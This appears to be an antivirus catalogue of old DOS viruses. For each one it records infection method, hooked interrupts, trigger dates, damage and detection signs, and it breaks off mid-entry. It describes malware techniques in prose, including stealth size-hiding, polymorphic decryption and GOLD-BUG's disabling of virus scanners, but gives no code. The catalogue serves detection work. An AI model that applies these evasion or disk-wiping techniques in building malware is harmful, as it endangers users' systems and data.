Virus Type: File Virus (COM files)
Virus Length: 356 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to original routine.
Infection Procedure: Hooks INT 21H (AH=4Bh) to infect files. First,
it hangs INT 24h to prevent divulging its trace when writing,
then checks whether the program to be executed is an uninfected
COM file. If it is, the virus proceeds to infect it. Lastly, the
virus restores INT 24h.
Damage: None
Detection method: Infected files increase by 356 bytes.
[Abraxas-3]
Virus Name: Abraxas-3
Virus Type: File Virus (EXE files)
Virus Length: 1200 bytes
Execution Procedure:
1) The virus plays the song "Do Re Mi Fa So La Si Do Re......".
2) Displays the message:
"abraxas"
in enlarged font.
3) Searches for an uninfected EXE file on the current directory and
proceeds to infect it (only infects one file at a time). The method
of infection is: it creates a file with the same name as the
original file, and its length is 1200 bytes.
Damage: The virus overwrites the original files with the virus code,
thus corrupting them.
Detection Method: Infected file length is 1200 bytes.
[Wolfman]
Virus Name: Wolf-Man
Virus Type: Memory Resident, File Virus (COM and EXE files)
Virus Length: 2064 bytes
PC Vectors Hooked: INT 09h, INT 10h, INT 16h, INT 21h
Execution Procedure:
1) Checks whether it remains resident in the memory. If not, it loads
itself resident into the memory.
2) Checks whether the current calendar day is 15. If it is, the virus
will manifest itself. Otherwise, it will hook INT 09H, INT 10H,
INT 16H, and INT 21H, then it will go back to the original
routine.
Infection Procedure:
1) Hooks INT 21H to infect files. It checks whether the program to be
executed is an infectable file (except COMMAND.COM), and then
proceeds to infect it (the infectable file length must be larger
than 1400 bytes).
2) Hooks INT 9h and INT 10h to check for a change in the program. If
there is, the virus will manifest itself.
Symptoms: Displays a message. Overwrites the current diskette with
the virus code until there is no more free space left. Delays 30
seconds and then proceeds to reboot the system.
Damage: Destroys all data on the current diskette.
Note:
1) Procedure for displaying the virus message is designed for the
Herc display card. Therefore, the system will halt if the virus
is run on a color display card. This, in turn, can prevent
destruction of the hard disk.
2) Virus procedure contains the text : "WOLFMAN"
Detection Method:
1) Infected files increase by 143 bytes.
2) Use MEM.EXE to check whether an executed program remains resident
in the memory (it will occupy approximately 65.6K bytes).
[Cuban]
Virus Name: Cuban
Virus Type: File Virus (COM files)
Virus Length: 1501 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to original routine.
3) Checks whether the current calendar day is 30. If it is, the virus
proceeds to destroy all data on the hard disk.
Infection Procedure:
1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs
INT 24h to prevent divulging its trace when writing. If the
program to be executed is an uninfected COM file, the virus
infects it directly. If the program to be executed is an EXE
file, it will search for an unfixed COM file and infect this COM
file.
2) Restores INT 24h.
Damage: The virus sometimes destroys all data on the hard disk.
Detection Method: Infected files increase by 1501 bytes.
[Darkend]
Virus Name: Darkend
Virus Type: File Virus (EXE files)
Virus Length: 1188 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to original routine.
3) Checks whether the current date is October 15. If it is, the virus
destroys all data on the hard disk.
Infection Procedure:
1) Hooks INT 21H (AH=4Bh) to infect files. If the program to be
executed is an uninfected EXE file, the virus proceeds to
infect it directly.
Damage: The virus sometimes destroys all data on the hard disk.
Detection method: Infected files increase by 1188 bytes.
[Story-A]
Virus Name: Story-A
Virus Type: File Virus (COM files)
Virus Length: 1117 bytes
PC Vectors Hooked: INT 08h
Execution Procedure:
1) Searches for three (3) uninfected COM files (excluding COMMAND.COM)
in the root directory and all subdirectories, and then infects
them (does not infect the same file twice).
2) Holds the order of every infected file.
3) Checks if the order of the current infected file is larger than 7,
or if the current date is July 9. If one of these two conditions
is met, the virus will activate.
Symptoms: Does not execute infection procedure, stays resident in
the memory. Then hooks INT 08h. 290 seconds later, a message appears
repeatedly (in 22-second cycles) in inverse mode.
Note: Date and time fields of infected files are not changed.
Detection Method:
1) Memory:
a) Total system memory decreases.
b) Virus might be triggered if the first 4 bytes of the segment
(before free memory) are FFh, 26h, 04h and 01h.
2) File:
a) Infected files increase by 1117 bytes.
b) First 4 bytes of infection are FFh, 26h, 04h and 01h.
[Story-B]
Virus Name: Story-B
Virus Type: File Virus (COM files)
Virus Length: 1168 bytes
PC Vectors Hooked: INT 08h
Execution Procedure:
1) Searches for three (3) uninfected COM files (excluding COMMAND.COM)
in the root directory and all subdirectories, and then infects them
(does not infect the same file twice).
2) Holds the order of infected files.
3) Checks if the order of the current infected file is larger than 7,
or whether the current month is December. If one of these two
conditions is met, the virus will activate.
Symptoms: Does not execute infection procedure, stays resident in the
memory. Then hooks INT 08h. 290 seconds later, a message appears
repeatedly (in 22-second cycles) in inverse mode.
Note: Date and time fields of infected files are not changed.
Detection method:
1) Memory:
a) Total system memory decreases.
b) Virus might be triggered if the first 4 bytes of the segment
(before free memory) are FFh, 26h, 04h and 01h.
2) File:
a) Infected files increase by 1168 bytes.
b) First 4 bytes of infection are FFh, 26h, 04h and 01h.
[MS DOS 3.0]
Virus Name: Ms-Dos3.0
Virus Type: File Virus (COM files)
Virus Length: 953 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and returns to the original routine.
Infection Procedure:
1) Hooks INT 21H (AH=3Dh,AX=4B00h) to infect files. If the program to
be executed or opened is an uninfected COM file (except
COMMAND.COM) and its length is not larger than FB00h, the virus
proceeds to infect it. The method of infection is: it writes a
total of 35Dh bytes (1Ch bytes for the head, first 3B9h bytes of
the file) at the end of the file, then overwrites its first 3B9h
bytes with the virus code. If the program to be executed or opened
is an uninfected EXE file and its length is not larger than 4000h,
the virus infects it. The method of infection is: after filling the
left bytes of the segment, it will attach a total of 3F1h bytes
(virus codes(3B9h)+data in original file(1Ch)+head offile(1Ch))
at the end of the file, then change the pointer to point to the
virus procedure.
Damage: None
Note:
1) Date and time fields of infected files are not changed.
2) Stealth type virus: restores infected file information while the
virus is memory resident.
Detection method:
1) Memory:
a) Total system memory decreases by 7A0h bytes.
b) Memory might be infected if AX=9051h (AX is the returned value
when INT 21h(AH=B3h) is called).
2) File:
a) Infected COM files increase by 500 bytes.
b) Infected EXE files increase by 1009-1024 bytes.
c) Use DEBUG to load an infected file.
[Evilgen]
Virus Name: Evilgen
Virus Type: File Virus (COM and EXE files)
Virus Length: 955 bytes (Version 1.1), 963 bytes (Version 2.0)
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and INT 09h and goes back to the original routine.
3) Checks if the current day is 24 and if the "Del" key is depressed.
If so, the virus will activate.
Infection Procedure:
1) Hooks INT 21H(AX=4B00h) to infect files. If the program to be
executed is an uninfected EXE or COM file, the virus proceeds to
infect it.
2) Hooks INT 09h to check whether the "Del" key is depressed.
Symptom: Selects a sector on the C drive, then formats the sector from
head 0, track 0 to head 0, track 20h.
Damage: The virus sometimes destroys the C drive.
Note:
1) Date and time fields of infected files are not changed.
2) While memory resident, typing " Dir" will not display the change
in the sizes of infected files.
Detection method:
1) Memory:
a) Total system memory decreases.
b) COMMAND.COM on the root directory of C is infected if BX=9051h
(BX is the returned value when INT 21h(AX=7BCDh) is called).
c) The pointers of INT 21h and INT 09h are the same.
2) File:
Infected files increase by 955 bytes (Version 1.1) or 963
bytes (Version 2.0.). These changes are only apparent if
the virus is not memory resident.
[Decide-2]
Virus Name: Decide-2
Virus Type: File Virus (COM files)
Virus Length: 1335 bytes
Execution Procedure:
1) Searches for an uninfected COM file on the current directory, and
then infects it (only infects one file at a time).
2) No matter whether it has infected a file or not, it will check
whether the current calendar month is September or October, and
the current day is between 3 and 18. If it is, the virus displays
the following:
"As the good times of DECIDE will be remembered, I started to
make a new virus. You are not facing the dark tombs of
"Morgoth". Humble regards to : Pazuzu, Kingu, Absu Mummu
Tiamat, Baxaxaxa Baxaxaxa, Yog Sothoth Iak Sakkath, Kutulu,
Humwawa Xaztur, Hubbur Shub Niggurath. Also my lovely regards
go to Stephanie, the only one who makes my heart beat
stronger. Want to make love with a Moribid Angel? Glenn
greets ya. Press a key to start the program..."
Damage: None
Note:
1) Does not remain in the memory.
2) An error message appears when writing because INT 24h has
not been hanged.
Detection method: Infected files increase by 1335 bytes.
[ED]
Virus Name: Ed
Virus Type: File Virus (COM and EXE files)
Virus Length: 775-785 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory by hooking INT 21h.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage: There is a flag in the virus procedure (every infected file
has a different flag). The flag decreases by 1 every time the virus
infects a new file. When the flag reaches zero, the virus will
destroy all data on the hard disk.
Detection method: Infected files increase by 775-785 bytes.
[Dima]
Virus Name: Dima
Virus Type: File Virus (COM and EXE files)
Virus Length: 1024 bytes
PC Vectors Hooked: INT 24h
Execution Procedure: Searches for all uninfected COM and EXE files
on all directories, and infects them. Hooks INT 24H to prevent
divulging its trace when writing.
Detection method: Infected files increase by 1024 bytes.
[Digger]
Virus Name: Digger
Virus Type: File Virus (COM and EXE files)
Virus Length: 1472-1482 bytes
Execution Procedure:
Searches for an uninfected COM or EXE file on the current directory,
and then infects it (does not reinfect).
Damage: None
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has
not been hanged.
Detection Method: Infected files increase by 1472-1482 bytes.
[FVHS]
Virus Name: Fvhs
Virus Type: File Virus (COM and EXE files)
Virus Length:
Execution Procedure:
Searches for an uninfected COM or EXE file on the current and
parent directories, then infects it. It infects three files at
a time.
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has
not been hanged.
[Egg]
Virus Name: Egg
Virus Type: File Virus (EXE files)
Virus Length: 1000-1005 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected EXE file, the virus proceeds to infect
it.
Damage: None
Detection method: Infected files increase by 1000-1005 bytes.
[Freddy]
Virus Name: Freddy
Virus Type: File Virus (EXE and COM files)
Virus Length: 1870-1880 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds
to infect it. The virus sometimes searches concurrently for
other uninfected files to infect.
Damage: None
Note: An error message appears when writing because INT 24h has
not been hanged.
Detection method: Infected files increase by 1870-1880 bytes.
[Ninja]
Virus Name: Ninja
Virus Type: File Virus (EXE and COM files)
Virus Length: 1511 or 1466 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
3) Checks whether the current calendar year is 1992, current day is 13,
and current time is 13:00. If these conditions are met, the virus
proceeds to destroy all data on the hard disk.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected EXE or COM file, the virus infects it.
Damage: The virus sometimes destroys all data on the hard disk.
Detection method: Infected files increase by 1511 or 1466 bytes.
[Yan-2505A]
Virus Name: Yan2505a
Virus Type: File Virus (EXE and COM files)
Virus Length: 2505 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and returns to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage: None
Detection method: Infected files increase by 2505 bytes.
[Suicide]
Virus Name: Suicide
Virus Type: File Virus (COM and EXE files)
Virus Length: 2048 bytes
Execution Procedure: Searches for uninfected COM and EXE files on
the current directory, and then infects them. It infects four files
at a time.
Damage: None
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection Method: Infected files increase by 2048 bytes.
[4915]
Virus Name: 4915
Virus Type: File Virus (EXE files)
Virus Length:
Execution Procedure: Searches for all uninfected EXE files on
the current directory in A, and then proceeds to infect them.
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
3) This virus was written using an advanced programming language.
[MSJ]
Virus Name: Msj
Virus Type: File Virus (EXE and COM files)
Virus Length: 15395 bytes
Execution Procedure: Searches for an uninfected EXE file on the current
directory in A, B or C, then proceeds to infect it. It only infects one
file at a time.
Damage: None
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
3) This virus was written using an advanced programming language.
Detection method: Infected files increase by 15395 bytes.
[Pa-5220]
Virus Name: Pa-5220
Virus Type: File Virus (EXE and COM files)
Virus Length:
Execution Procedure: Searches for an uninfected COM or EXE file on the
current directory in A, B or C, then infects it. It only infects one
file at a time.
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
3) This virus was written using an advanced programming language.
[PCBB-11]
Virus Name: Pcbb11
Virus Type: File Virus (EXE and COM files)
Virus Length: 3052 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage:
Detection method: Infected files increase by 3052 bytes.
[Bow]
Virus Name: Bow
Virus Type: File Virus (EXE and COM files)
Virus Length: 5856 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM or EXE file, the virus proceeds to infect it.
Damage: None
Note:
1) An error message appears when writing because INT 24h has not been
hanged.
2) This virus was written using an advanced programming language.
Detection Method: Infected files increase by 5856 bytes.
[PCBB-3072]
Virus Name: Pcbb3072
Virus Type: File Virus (EXE and COM files)
Virus Length: 3,072 bytes
PC vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds
to infect it.
Damage:
Detection Method: Infected files increase by 3072 bytes.
[Terminal]
Virus Name: Terminal
Virus Type: File Virus (EXE and COM files)
Virus Length:
Execution Procedure: Searches for an uninfected EXE file on
the current directory in C, then infects it.
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
3) This virus was written using an advanced programming language.
4) This virus is encrypted by a program like PKLITE. Although it
has a pattern, we were not able to scan it.
[Lanc]
Virus Name: Lanc
Virus Type: File Virus (EXE files)
Virus Length: 7,376 bytes
Execution Procedure:
1) Searches for an uninfected EXE file on the current directory.
2) Creates a new COM file with the same file name as the original EXE
file. This new COM file contains the virus.
Damage: None
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
3) This virus was written using an advanced programming language.
Detection method: Check whether the file length is 7376 bytes.
[Nazi-Phobia]
Virus Name: Nazi-Phobia
Virus Type: File Virus (EXE files)
Virus Length:
Execution Procedure: Searches for an uninfected EXE file on the
current directory, then infects it. It only infects one file at a
time.
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
3) This virus was written using an advanced programming language.
[Animus]
Virus Name: Animus
Virus Type: File Virus (COM and EXE files)
Virus Length: 7,360 or 7,392 bytes
Execution Procedure: Searches for an uninfected COM or EXE file on the
current directory, then infects it. It only infects two or three files
at a time.
Damage: None
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
3) This virus was written using an advanced programming language.
Detection method: Infected files increase by 7360 or 7392 bytes.
[Hitler]
Virus Name: Hitler
Virus Type: File Virus (COM files)
Virus Length: 4,808 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 4808 bytes.
[Hellwean-1182]
Virus Name: Hellwean1182
Virus Type: File Virus (EXE and COM files)
Virus Length: 1182 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage: None
Detection method: Infected files increase by 1182 bytes.
[Minsk-GH]
Virus Name: Minsk-Gh
Virus Type: File Virus (EXE and COM files)
Virus Length: 1450-1490 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage: None
Note: This virus cannot run on DOS 5.0.
Detection method: Infected files increase by 1450-1490 bytes.
[LV]
Virus Name: Lv
Virus Type: File Virus (COM files)
Virus Length:
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and then checks whether COMMAND.COM that booted up the
system is infected or not. If not, the virus infects it and returns
to the original routine.
Infection Procedure:
1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect
it.
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
[Mini-207]
Virus Name: Mini-207
Virus Type: File Virus (COM files)
Virus Length: 207 bytes
Execution Procedure: Searches for all uninfected COM files on the
current directory, then infects them.
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
[Brother_300]
Virus Name: Brother_300
Virus Type: File Virus (EXE files)
Virus Length: 300 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected EXE file, it creates a new COM file
with the same name as the EXE file. This new COM file contains
the virus. Its length is 300 bytes.
Damage: None
Detection method: Checks whether the file's length is 300 bytes.
[Lip-286]
Virus Name: Lip-286
Virus Type: File Virus (COM files)
Virus Length: 286 bytes
Execution Procedure: Searches for an uninfected COM file on the
current directory, then infects it. It infects two or three files at
a time.
Damage: There is a flag in the virus procedure (every infected file
has a different flag). The flag decreases by 1 every time the virus
infects a file. When the flag reaches zero, the virus will destroy
all data on the hard disk.
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 286 bytes.
[Gomb]
Virus Name: Gomb
Virus Type: File Virus (COM files)
Virus Length: 4093 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 4093 bytes.
[Bert]
Virus Name: Bert
Virus Type: File Virus (COM and EXE files)
Virus Length: 2294 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM or EXE file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 2294 bytes.
[Triple Shot]
Virus Name: Triple-shot
Virus Type: File Virus (EXE files)
Virus Length: 6610
Execution Procedure: Searches for an uninfected EXE file on the
current directory. Then creates a new hidden COM file with the
same name as the EXE file. This new COM file is the virus. Its
length is 6610 bytes.
Damage: None
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Check whether the file's length is 6610 bytes.
[Fame]
Virus Name: Fame
Virus Type: File Virus (EXE files)
Virus Length: 896 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected EXE file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 896 bytes.
[CCCP]
Virus Name: Cccp
Virus Type: File Virus (COM files)
Virus Length: 510 bytes
Execution Procedure: Searches for an uninfected COM file on the
current directory, then infects it. It infects two or three files at
a time.
Damage: There is a flag (valued 0 to 25) in the virus procedure
(every infected file has a different flag). When an infected file
with flag of 25 is executed, the virus will destroy all data on the
hard disk.
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 510 bytes.
[L1]
Virus Name: L1
Virus Type: File Virus (COM files)
Virus Length: 140 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Note: An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 140 bytes.
[Crepate]
Virus Name: Crepate
Virus Type: File Virus
Virus infects .COM between 400 and 62000 bytes,
.EXE shorter than 589824 bytes. Virus is Memory Block
Resident.
Virus Length: 2910 bytes (file), 4K bytes (memory).
Interrupt Vectors Hooked: INT 21h
Infection Process: Every infected file becomes 2910 bytes longer,
with the virus code at the end and some kind of a header created
by the virus. The second group of bytes indicating the time of
creation of the file, is set to 31 (1Fh). Every subsequent file
infection, the virus resets the system memory from address 0:413
to 280h (640 K).
Damage: Virus formats the hard disk.
Symptoms: Loss of data stored in the last 7 sectors of the diskette,
loss of data stored in the last cylinder, first side, first 7 sectors,
increased file size.
Note: This virus doesn't infect files named as : "*AN.???" or
"*LD.???" To recognize the virus presence in the boot sector one
can look for:
- a byte valued FFh in the offset 4 in floppy disks.
- a word valued 2128h in the offset 4 in hard disks.
Furthermore, at the end of each infected file, a text string can
be found:
"Crepa (C) bye R.T.".
This text can be easily modified. The DOS Chkdsk command, when
the virus is resident, reveals a decrease of 4K bytes in the available
memory.
[Die Lamer]
Virus Name: DIE LAMER
Virus Type: Resident at the top of the MCB (Memory Control
Block).
Virus Length: 1,136 bytes
Interrupt Vectors Hooked: INT 21h
Infection Process:
This virus is spread by executing an infected program. When a DIE
LAMER infected program is executed, it will first check to see if
it is already resident in the memory by checking if address 0:4f2h
contains the value 3232h. If it is already in the memory it will
execute the infected program. If not, it will perform the following
functions:
Damage: Loss of some data stored in the floppy.
Symptoms: Garbage in floppy disk. Increased file sizes. Screen
displays:
"-=*@DIE_LAMER@*=-."
Note: The method used by the virus is very dangerous, because if
an anti-virus program catches this virus in the memory and displays
the message: "found '-=*@DIE_LAMER@*=-' in memory", the virus
will only write garbage to the floppy, but the virus program can be
easily modified to execute more destructive routines (such as
formatting the hard disk, etc...).
[FaxFree]
Virus Name: FAXFREE
Virus Type: File Virus
Virus infects .COM and .EXE files as long as they are
longer than 32 bytes, and shorter than 131,072
bytes. Infects Partition record. File Virus.
Virus Length: 3 Kb
PC Vectors Hooked: INT 21h
Infection Process: This virus can be spread by executing an
infected program or from booting the system with an infected
disk. There are several methods of infection. When an infected
program is executed in a clean system, the virus first removes
the contents of the original partition sector of the hard disk to
the last sector of the last side of the last cylinder. Then the
virus will copy itself in the last side of the last cylinder,
beginning from the 9th last sector to the 6th last sector. These
sectors are not marked as "bad sectors" and get overwritten by
the virus, with no regards for their previous contents.
Damage: Hangs the system. Infected files will increase in length by
2048 bytes, with the virus code file infection.
Symptoms: When the virus wants to replace the original partition
sector, it needs to decrypt some data which after decryption
shows the following text strings :
"PISello tenere fuori dalla portata dei bambini.
PaxTibiQuiLegis.FaxFree!!"
Note: This virus doesn't infect files named as : "*AN.???" ,
"*OT.???" or "*ND.???" If the system date is between the 25th and
30th of April, the virus will hang the system. The virus uses a
smart technique to avoid anti-virus detection programs, when
modifying the partition sector that is hooking int 01h, it will
turn on a single step flag to get the original entry of DOS
hooked. The virus will then move itself to the top of the MCB
(Memory Control Block), and decrease available memory in the MCB
by 3Kb. It will hook Int 13h and Int 21h and then run the
original program.
[Ghost Player]
Virus Name: GHOST PLAYER
Virus Type: File Virus (EXE files), Memory Block Resident
Virus Length: 1,200 bytes
PC Vectors Hooked: INT 21h
Infection Process: This virus is spread by executing an infected
program. When a GHOST PLAYER infected program is executed, if DOS
version is greater than 3 and the serial number of default disk
equals zero, virus will execute the infected program. Otherwise
virus performs the following functions: virus stays resident at
the top of the MCB (memory control block) but below the DOS 640k
boundary. The available free memory will decrease by 1200 (4B0H)
bytes.
Damage: Virus increases file lengths.
Symptoms: Decreased available memory. If a random value is equal
to FF00, the virus displays the following message: " ! Bumpy"
Furthermore, the screen shakes up and down.
Note: The virus doesn't infect files named as : "TB*.???" , "F-*.???"
, "CP*.???" , "NA*.???" , "SC*.???" "CL*.???" or "V*.???".
[Gold Bug]
Virus Name: GOLD-BUG
Virus Type: Spawning Color Video Resident and Extended HMA Memory
Resident Boot-Sector and Master-Sector Infector
Virus Length: 1,024 Bytes
Interrupt Vectors Hooked: INT 21h, INT 13h
Infection Process: GOLD-BUG is a memory-resident multipartite
polymorphic stealthing boot-sector spawning anti-antivirus virus
that works with DOS 5 and DOS 6 in the HIMEM.SYS memory. When an
.EXE program infected with the GOLD-BUG virus is run, it
determines if it is running on an 80186 or better, if not it will
terminate and not install. If it is on an 80186 or better it will
copy itself to the partition table of the hard disk and remain
resident in memory in the HMA (High Memory Area) only if the HMA
is available, i.e., DOS=HIGH in the CONFIG.SYS file else no
infection will occur. The old partition table is moved to sector
14 and the remainder of the virus code is copied to sector 13.
The virus then executes the spawned associated file if present.
INT 13 and INT 2F are hooked into at this time but not INT 21.
The spawning feature of this virus is not active now.
Damage: The GOLD-BUG virus also has an extensive anti-antivirus
routine. It writes to the disk using the original BIOS INT 13
and not the INT 13 chain that these types of programs have hooked
into. It hooks into the bottom of the interrupt chain rather
than changing and hooking interrupts. If the GOLD-BUG virus is
resident in memory, any attempts to run most virus scanners will
be aborted. GOLD-BUG stops any large .EXE file (greater than 64k)
with the last two letters of "AN" to "AZ". It will stop
SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE,
TNTAV.EXE, and so on. The SCAN program will either be deleted or
an execution error will return. Also, GOLD-BUG will cause a CMOS
checksum failure to happen the next time the system boots up. GOLD-BUG
also erases "CHKLIST.???" created by CPAV.EXE and MSAV.EXE.
Programs that do an internal checksum on themselves will not
detect any changes.
Symptoms: CMOS checksum failure. Creates files with no
extension; Modem answers on 7th ring. Most virus scanners fail
to run or are Deleted. And CHKLIST.??? files are deleted.
Note: The GOLD-BUG virus is also Polymorphic. Each .EXE file it
creates only has 2 bytes that remain constant. It can mutate
into 128 different decryption patterns. It uses a double
decryption technique that involves INT 3 that makes it very
difficult to decrypt using a debugger. The assembly code allowed
for 512 different front-end decryptors. Each of these can mutate
128 different ways.
[Invisible Man]
Virus Name: INVISIBLE MAN
Virus Type: File Virus (COM and EXE files), Partition,
Boot record, Memory Block Resident
Virus Length: 2926 Bytes (file), D80h Bytes (memory)
Interrupt Vectors Hooked: INT 21h
Infection Process:
This virus can spread by executing an infected program or by
booting the system from an infected disk. There are several
different methods of infection:
(1). When an INVISIBLE MAN infected program is executed it will;
A. Infect the hard disk partition table :
(i) Write the virus body to the last 7 sectors of the active
hard disk.
(ii) The ending location of the active hard disk will be
decreased by 7 sectors.
(iii) Write the virus loader to the partition sector. This
sector will be encrypted.
B. Modify the boot sector:
It will change the total sector numbers message, which will
be seven less than the original figure.
Damage: The virus displays a message and plays music on the system
speaker.
Symptoms:
